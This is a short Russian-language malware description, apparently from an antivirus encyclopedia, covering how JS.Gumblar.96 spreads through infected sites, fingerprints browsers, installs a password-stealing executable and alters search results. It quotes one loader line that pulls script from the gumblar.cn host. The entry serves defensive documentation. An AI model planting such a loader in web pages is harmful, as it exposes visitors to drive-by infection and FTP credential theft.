Способ распространения
Вредоносный javascript JS.Gumblar.96, распространяется через зараженные веб-ресурсы. При посещении которых происходит определение типа веб-бразера и установленных плагинов, после чего осуществляется подгрузка javascript-сценария содержащего эксплойт или переадресация на злонамеренную веб-страницу.
Действия, совершаемые вирусом
JS.Gumblar.96 зашифрованный javascript-сценарий посредством которого в систему может быть установлен вредоносный исполняемый файл. Установленный в систему вирус влияет на результаты поиска в поисковой системе Google и похищает пароли от FTP-серверов для последующего их заражения.
В процессе посещения вредоносного веб-ресурса JS.Gumblar.96 осуществляет подгрузку javascript-сценария следующим образом:
document.write("src=//gumblar.cn/rss/?id=" + j + "")
После того, как вредоносный скрипт загружен происходит атака с использованием набора распространенных уязвимостей для установленного типа системы по полю User-Agent.
